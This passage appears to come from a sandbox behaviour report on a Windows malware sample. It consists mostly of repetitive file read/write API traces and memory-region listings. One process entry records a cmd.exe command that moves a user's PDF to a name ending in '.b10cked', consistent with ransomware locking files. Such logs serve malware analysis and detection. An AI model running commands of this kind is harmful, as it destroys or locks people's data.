lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.063] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.063] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] GetFileType (hFile=0x4c) returned 0x1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] GetFileType (hFile=0x4c) returned 0x1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] GetFileType (hFile=0x4c) returned 0x1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] GetFileType (hFile=0x4c) returned 0x1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] GetFileType (hFile=0x4c) returned 0x1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] GetFileType (hFile=0x4c) returned 0x1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] GetFileType (hFile=0x4c) returned 0x1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] GetFileType (hFile=0x4c) returned 0x1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.064] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.064] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] GetFileType (hFile=0x4c) returned 0x1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] GetFileType (hFile=0x4c) returned 0x1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] GetFileType (hFile=0x4c) returned 0x1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] GetFileType (hFile=0x4c) returned 0x1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] GetFileType (hFile=0x4c) returned 0x1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] GetFileType (hFile=0x4c) returned 0x1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] GetFileType (hFile=0x4c) returned 0x1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] GetFileType (hFile=0x4c) returned 0x1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.065] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.065] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] GetFileType (hFile=0x4c) returned 0x1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] GetFileType (hFile=0x4c) returned 0x1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] GetFileType (hFile=0x4c) returned 0x1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] GetFileType (hFile=0x4c) returned 0x1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.065] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.065] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.066] GetFileType (hFile=0x4c) returned 0x1 [0140.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.066] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.066] GetFileType (hFile=0x4c) returned 0x1 [0140.066] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] GetFileType (hFile=0x4c) returned 0x1 [0140.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] GetFileType (hFile=0x4c) returned 0x1 [0140.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.764] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.764] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.764] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.764] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] GetFileType (hFile=0x4c) returned 0x1 [0140.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] GetFileType (hFile=0x4c) returned 0x1 [0140.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.764] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] GetFileType (hFile=0x4c) returned 0x1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] GetFileType (hFile=0x4c) returned 0x1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] GetFileType (hFile=0x4c) returned 0x1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] GetFileType (hFile=0x4c) returned 0x1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] GetFileType (hFile=0x4c) returned 0x1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.765] GetFileType (hFile=0x4c) returned 0x1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.766] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.766] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.766] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.766] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] GetFileType (hFile=0x4c) returned 0x1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] GetFileType (hFile=0x4c) returned 0x1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] GetFileType (hFile=0x4c) returned 0x1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] GetFileType (hFile=0x4c) returned 0x1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] GetFileType (hFile=0x4c) returned 0x1 [0140.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.766] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] GetFileType (hFile=0x4c) returned 0x1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] GetFileType (hFile=0x4c) returned 0x1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] GetFileType (hFile=0x4c) returned 0x1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.767] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.767] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.767] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.767] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x32, lpOverlapped=0x0) returned 1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] GetFileType (hFile=0x4c) returned 0x1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] GetFileType (hFile=0x4c) returned 0x1 [0140.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.767] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x32, lpOverlapped=0x0) returned 1 [0140.768] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.768] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.768] _close (_FileHandle=4) returned 0 [0140.768] FindNextFileW (in: hFindFile=0x350ee0, lpFindFileData=0x2af454 | out: lpFindFileData=0x2af454) returned 0 [0140.768] GetLastError () returned 0x12 [0140.768] FindClose (in: hFindFile=0x350ee0 | out: hFindFile=0x350ee0) returned 1 [0140.769] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0140.769] _close (_FileHandle=3) returned 0 [0140.769] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.769] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.770] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.770] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.770] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.770] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.770] SetConsoleInputExeNameW () returned 0x1 [0140.770] GetConsoleOutputCP () returned 0x1b5 [0140.770] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.770] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.770] exit (_Code=0) Process: id = "171" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0x638" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14976 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14977 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14978 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14979 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 14980 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14981 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14982 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14983 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14984 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 14985 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15498 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15499 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15500 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15501 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 15502 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 15503 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15504 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15505 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15506 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15507 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15508 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = 